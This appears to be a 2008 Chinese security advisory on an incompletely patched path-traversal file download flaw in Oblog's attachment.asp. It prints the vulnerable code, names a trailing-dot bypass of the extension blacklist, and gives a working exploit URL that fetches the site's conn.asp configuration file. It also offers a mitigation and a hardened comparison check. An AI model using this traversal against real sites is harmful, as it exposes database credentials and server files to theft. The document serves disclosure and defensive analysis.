Really patched? Oblog vulnerability reproduced - Bug Warning - Heiba Security Net (黑吧安全网)

2008-05-02T00:00:00
ID MYHACK58:62200818933
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-05-02T00:00:00

Description

Author: Tr4c3. This was originally a gift shared only with friends in the BK Instant QQ group, explicitly on the condition that it not be passed on to the vendor. Unfortunately someone got it to the vendor first for testing, which was disappointing; that person was kicked and banned. So today it is being released to everyone.

##################################################################

Tr4c3[at]126[dot]com, written 2008-04-29. Copyright: http://www.nspcn.org/ http://www.tr4c3.com/ BK Instant [QQ group] & Hi [QQ group]

##################################################################

Program download: http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar

##################################################################

Description:

On April Fool's Day an Oblog arbitrary file download vulnerability was published on my blog; see http://www.tr4c3.com/post/302.html, "<0day> April Fool's Day gift: Oblog file download vulnerability". The vendor later changed the relevant code in the Oblog release and posted a patch; see http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=132375 [oblog46 Experience Edition _patch_20080403 patch]. After the patch, http://www.target.com/attachment.asp?path=./conn.asp can no longer download the file. I downloaded the latest version, 4.60 Final Build080403 Access (which integrates the attachment.asp patch), from the official site and found that the modified code does not solve the problem: the Oblog arbitrary file download vulnerability still exists. See the attachment.asp code for details.

##################################################################

Key parts (attachment.asp, line numbers of the original listing stripped; Tr4c3's annotations kept as comments):

  Path = Trim(Request("path"))    ' get the user-submitted path
  FileID = Trim(Request("FileID"))
  If FileID = "" And Path = "" Then
      Response.Write "parameters"
      Response.End
  End If
  ...
  If CheckDownLoad Or 1=1 Then
      If Path = "" Then
          Set rs = Server.CreateObject("ADODB.RecordSet")
          link_database
          SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = " & CLng(FileID))
          rs.open sql,conn,1,3
          If Not rs.Eof Then
              uid = rs(1)
              file_ext = rs(2)
              rs("ViewNum") = rs("ViewNum") + 1
              rs.Update
              downloadFile Server.MapPath(rs(0)),0
          Else
              Response.Status=404
              Response.Write "the attachment does not exist!"
          End If
          rs.Close
          Set rs = Nothing
      Else
          ' Tr4c3 note: look here. The only check is whether the user-submitted path CONTAINS the configured
          ' upload directory string (CacheConfig(56)); if it does, downloadFile is called to send the file.
          If InStr(path,Oblog.CacheConfig(56)) > 0 Then
              downloadFile Server.MapPath(Path),1
          End if
      End If
  Else
      ' If the attachment is a picture and the permission check fails, serve a default image
      ' so that <img> tags still render and the page layout is not affected
      If Path = "" Then
          Response.Status=403
          Response.Write ShowDownErr
          Response.End
      Else
          downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
      End if
  End if

  Set oblog = Nothing

  Sub downloadFile(strFile,stype)
      On Error Resume Next
      Server.ScriptTimeOut=9999999
      Dim S,fso,f,intFilelength,strFilename
      strFilename = strFile
      Response.Clear
      Set s = Server.CreateObject(oblog.CacheCompont(2))
      s.Open
      s.Type = 1
      Set fso = Server.CreateObject(oblog.CacheCompont(1))
      If Not fso.FileExists(strFilename) Then
          If stype = 0 Then
              Response.Status=404
              Response.Write "the attachment has been deleted!"
              Exit Sub
          Else
              strFilename = Server.MapPath(blogdir&"images/nopic.gif")
          End if
      End If
      Set f = fso.GetFile(strFilename)
      intFilelength = f.size
      s.LoadFromFile(strFilename)
      If Err Then
          Response.Write("<h1>error: </h1>" & Err.Description & "<p>")
          Response.End
      End If
      Set fso=Nothing
      Dim Data
      Data=s.Read
      s.Close
      Set s=Nothing
      Dim ContentType
      Select Case LCase(Right(strFile, 4))
          ' Tr4c3 note: now look here; remember this? The arbitrary download vulnerability I published a few
          ' days ago in the 沸腾展望 (Feiteng Zhanwang) news system [http://www.tr4c3.com/post/306.html] used
          ' almost the same check, the exploitation method is similar, and the magic trailing "." comes in handy again.
          Case ".asp",".mdb",".config",".js"
              Exit Sub
          Case ".asf"
              ContentType = "video/x-ms-asf"
          Case ".avi"
              ContentType = "video/avi"
          Case ".doc"
              ContentType = "application/msword"
          Case ".zip"
              ContentType = "application/zip"
          Case ".xls"
              ContentType = "application/vnd.ms-excel"
          Case ".gif"
              ContentType = "image/gif"
          Case ".jpg", "jpeg"
              ContentType = "image/jpeg"
          Case ".wav"
              ContentType = "audio/wav"
          Case ".mp3"
              ContentType = "audio/mpeg3"
          Case ".mpg", "mpeg"
              ContentType = "video/mpeg"
          Case ".rtf"
              ContentType = "application/rtf"
          Case ".htm", "html"
              ContentType = "text/html"
          Case ".txt"
              ContentType = "text/plain"
          Case Else
              ContentType = "application/octet-stream"
      End Select
      If Response.IsClientConnected Then
          If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0) Then
              Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
          End If
          Response.AddHeader "Content-Length", intFilelength
          Response.CharSet = "UTF-8"
          Response.ContentType = ContentType
          Response.BinaryWrite Data
          Response.Flush
          Response.Clear()
      End If
  End Sub

##################################################################

Exploitation method: http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.

##################################################################

Repair recommendations: Wait for the official release of new patches.

##################################################################

Temporary workaround: in attachment.asp, change line 5, Path = Trim(Request("path")), to Path = Replace(Trim(Request("path")),"..","")
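To make the two weaknesses in the key parts above concrete, here is an added Python model (my own illustration, not Oblog code) of the substring check plus the four-character suffix blacklist, beside a check that canonicalises the path and confines it to the upload directory before testing the extension. The web root, the upload directory value of CacheConfig(56) and the Windows trailing-dot handling are assumptions.

```python
import posixpath

# Constructed model of the attachment.asp checks; values below are assumptions, not Oblog's own.
UPLOAD_DIR = "UploadFiles"                       # assumed value of Oblog.CacheConfig(56)
BLOCKED_EXT = (".asp", ".mdb", ".config", ".js")  # the Select Case blacklist in downloadFile
WEB_ROOT = "/var/www/oblog"                      # assumed Server.MapPath base


def vulnerable_allows(path: str) -> bool:
    """Mirror of the original logic: InStr substring test, then LCase(Right(strFile, 4))."""
    if UPLOAD_DIR not in path:                   # InStr(path, CacheConfig(56)) > 0
        return False
    # Right(strFile, 4) only ever sees four characters, so ".config" can never match
    # and a name ending in "asp." is not ".asp".
    return path.lower()[-4:] not in BLOCKED_EXT


def hardened_allows(path: str) -> bool:
    """Canonicalise, confine to the upload directory, then check the real extension."""
    if "\\" in path or "\x00" in path:
        return False
    # Assumption: classic ASP on IIS/Windows opens "conn.asp." as "conn.asp" because the
    # file system ignores trailing dots and spaces, so normalise them away before checking.
    name = path.rstrip(". ")
    full = posixpath.normpath(posixpath.join(WEB_ROOT, name))
    allowed_root = posixpath.join(WEB_ROOT, UPLOAD_DIR) + "/"
    if not full.startswith(allowed_root):        # the resolved file must live under UploadFiles/
        return False
    ext = posixpath.splitext(full)[1].lower()    # full extension, not a fixed 4-character tail
    return ext not in BLOCKED_EXT


if __name__ == "__main__":
    # Constructed requests: the advisory's traversal with and without the trailing dot, and a normal file.
    for p in ("UploadFiles/../conn.asp.", "UploadFiles/../conn.asp", "UploadFiles/2008/photo.jpg"):
        print(f"{p!r:35} original={vulnerable_allows(p)!s:5} hardened={hardened_allows(p)}")
```

The original check lets the traversal through as soon as the trailing dot defeats the suffix test; the hardened check rejects it because the resolved path is outside the upload directory regardless of the name.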
